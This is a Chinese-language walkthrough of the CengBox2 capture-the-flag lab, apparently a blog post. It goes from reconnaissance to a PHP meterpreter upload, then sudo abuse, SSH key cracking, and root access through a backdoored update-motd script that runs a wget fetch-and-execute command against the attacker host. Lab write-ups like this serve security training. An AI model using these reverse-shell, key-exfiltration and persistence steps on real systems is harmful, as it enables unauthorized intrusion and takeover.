VulnHub CengBox2靶机渗透
本文首发于微信公众号:VulnHub CengBox2靶机渗透,未经授权,禁止转载。
难度评级:☆☆☆☆
官网地址:https://download.vulnhub.com/cengbox/CengBox2.ova
天翼云盘:https://cloud.189.cn/t/nq6r6jQVRZBz
百度网盘:https://pan.baidu.com/s/1EMIZg3x2ebqOdRmif4O2Jg 提取码:gt6g
官网简介:Ceng Company似乎正在维护,但仍可能运行着某些业务
渗透目标:获取普通用户以及root用户权限
本机地址:192.168.110.27
靶机地址:192.168.110.30, 192.168.110.32
信息收集
老规矩,还是nmap开路。
nmap 192.168.110.0/24
扫描结果显示共开启了3个端口,分别运行着FTP、SSH和HTTP服务。一般来说,漏洞出现在HTTP服务的可能性最大,首先看看网站有什么敏感信息。
显示网站正在维护,源码中也没有提供任何有用的信息。那么就需要使用dirb扫描网页目录了。
dirb 192.168.110.30
只扫到了两个页面,index.html很明显是刚才访问的主页,而server-status是不可能有权限访问的,也就是说,dirb没有扫出有用信息。
既然80端口找不到突破点,那么看看FTP服务可不可以匿名登录。
ftp 192.168.110.30
可以匿名登录,查看一下ftp目录下有什么敏感文件。
ls
有一个名为note.txt的文件,不管三七二十一,先下载下来再说。
get note.txt
下载完成,查看文件内容。
文件内容提示Aaron用默认密码初始化了Kevin的账号,并且把站点转移到了ceng-company.vm域下。猜测通过域名和IP访问网站的相应结果不同。
修改hosts文件,把ceng-company.vm定向到192.168.110.30。
sudo vim /etc/hosts
接下来使用浏览器访问ceng-company.vm看看是否有不同的返回结果。
很遗憾,还是之前的页面。再次使用dirb扫描看看。
依然没有有用的信息,不过既然靶机作者给出了提示,那么突破点就应该在网页上。
考虑到ceng-company.vm是一级域名,而绝大多数网站都是通过二级域名访问的,例如www.sogou.com、blog.csdn.net等。因此考虑在ceng-company.vm前加上前缀,组成二级域名,看网站是否有不同的响应。
vim /etc/hosts
这里添加了www、bbs、login、admin和blog这几个常见的前缀。经过测试,admin.ceng-company.vm会显示禁止访问,而其他二级域名则显示与ceng-company.vm一样的结果。
admin.ceng-company.vm一定有猫腻,再次使用dirb扫描。
dirb http://admin.ceng-company.vm
这次的结果更惨,只扫到一个页面。虽然没有扫描出什么结果,但admin.ceng-company一定是靶机的突破口,应该是dirb默认的字典不够大才无法扫描到有用的结果。
结合以前使用dirbuster需要一个小时才能扫描完成的经历,将默认字典换成dirbuster的字典再次尝试,由于dirbuster的自带的字典过于庞大,需要使用-w参数才能正常使用。
dirb http://admin.ceng-company.vm /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w
功夫不负有心人,经过漫长的等待,终于发现了一个可以访问的目录。
网页端查看该目录,发现是一个CMS。
点击网页的所有链接发现没有有用的信息后,尝试访问login页面。
由于note.txt中给出了提示,Kevin的账号是使用默认密码初始化的,尝试E-mail为kevin@ceng-company.vm,密码为admin登录。
登录成功后网页又跳转到初始页面,那么就试试admin页面。
查看页面内容后发现Content -> File Manager可以上传文件。
通过这个页面应该可以上传PHP木马,接下来需要配合msf等工具生成PHP木马,并获取靶机的远程shell。
漏洞利用
首先需要使用msf生成PHP木马。
msfconsole
use multi/script/web_delivery
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.110.27
set target PHP
run
这几条命令将会生成shell命令,复制eval部分内容保存成php脚本文件,然后上传到靶机上。
显示上传成功,但是在网页端并没有查看到shell.sh,可能被服务器过滤了。接下来尝试上传到tmp目录。
上传成功,访问admin.ceng-company.vm/gila/tmp/shell.php。
显示禁止访问,这应该与.htaccess文件有关,打开.htaccess,重命名为.htaccess.bak。
闯大祸了,修改文件名之后所有的页面都不可访问,这下彻底没有办法了。由于没有对靶机做备份,需要重新导入ova文件,靶机的IP更新为192.168.110.32。
这里的原因是删除了根目录下的.htaccess,本来只需要删除tmp下的.htaccess文件即可。
将其重命名为.htaccess.bak。
然后再访问admin.ceng-company.vm/gila/tmp/shell.php。
msf成功获取靶机shell。
sessions l
sessions -i 1
shell
将不好用的shell改为bash。
whereis python
系统中安装了python2.7和python3.5。
python3.5 -c 'import pty; pty.spawn("/bin/bash")'
权限提升
切换到家目录查看有哪些用户。
cd /home
dir
其中无法进入mitnick目录,可以进入swartz目录。
查看当前目录下有没有可以利用的文件。
ls -l
查看文件内容。
cat runphp.sh
该文件的功能为交互式运行php,查看是否可以以swartz权限执行该脚本。
sudo -l
果然,是可以免密码以swartz权限执行runphp.sh的。
sudo -u swartz ./runphp.sh
需要注意参数,./runphp.sh和/home/swartz/runphp.sh都可以,但是不能直接使用文件名,否则还是需要输入密码。
接下来使用交互式php获取swartz的shell。
pcntl_exec('/bin/bash');
再次尝试进入mitnick家目录。
成功进入,查看该目录下有无提示。
ls -la
有一个名为user.txt的文件,但是没有任何权限,很明显,这是在提示需要提权到mitnick用户才能进入下一步。
查找一下有什么文件可以以mitnick或root权限运行。
sudo -l
很遗憾,需要密码。这时候注意到mitnick家目录下有.ssh文件夹,进入文件夹查看。
查看id_rsa。
接下来尝试使用John the Rapper暴力破解密码。
nc -lvvp 31337 < id_rsa
nc 192.168.110.32 31337 > mitnick.key
将mitnick.key转换成john可识别的文件。
/usr/share/john/ssh2john.py mitnick.key > mitnick.john
cat mitnick.john
使用John the Rapper暴力破解。
locate rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt mitnick.john
几秒钟就将密码爆破出来了。接着使用mitnick.key登录靶机。
ssh -i mitnick.key mitnick@ceng-company.vm
无法登录,原因是mitnick.key权限为644,需要改成600才能登录。
chmod 600 mitnick.key
ssh -i mitnick.key mitnick@ceng-company.vm
查看user.txt
cat user.txt
第一个flag已经拿到。现在需要提权到root,首先查找有哪些可以利用的文件。
find / -type f -perm -g+rwx 2>/dev/null
update-motd.d文件夹下的脚本会在用户通过SSH登录时由root运行,主要的作用是在登录时显示消息。既然有写权限,那么进行反弹shell。
使用msf生成反弹shell脚本。
use multi/script/web_delivery
set payload linux/x86/shell_reverse_tcp
set LHOST 192.168.110.27
set target Linux
run
执行之后将会生成一个wget命令。
将该命令写进脚本并设置可执行权限。
- echo "wget -qO gA5sN4z7 --no-check-certificate http://192.168.110.27:8080/kVEbfSR4mAORkbG; chmod +x gA5sN4z7; ./gA5sN4z7& disown" > rootShell.sh
-
- chmod 777 rootShell.sh
最后将rootShell.sh写进00-header。
echo "sh /home/mitnick/rootShell.sh" >> /etc/update-motd.d/00-header
注销SSH会话,重新连接。
exit
ssh -i mitnick.key mitnick@192.168.110.32
此时msf已经成功获取shell。
sessions -l
sessions -i 1
检查权限,切换成bash。
id
python3.5 -c 'import pty; pty.spawn("/bin/bash")'
查找flag。
cd /root
ls
cat root.txt
至此,对靶机的渗透已经全部完成。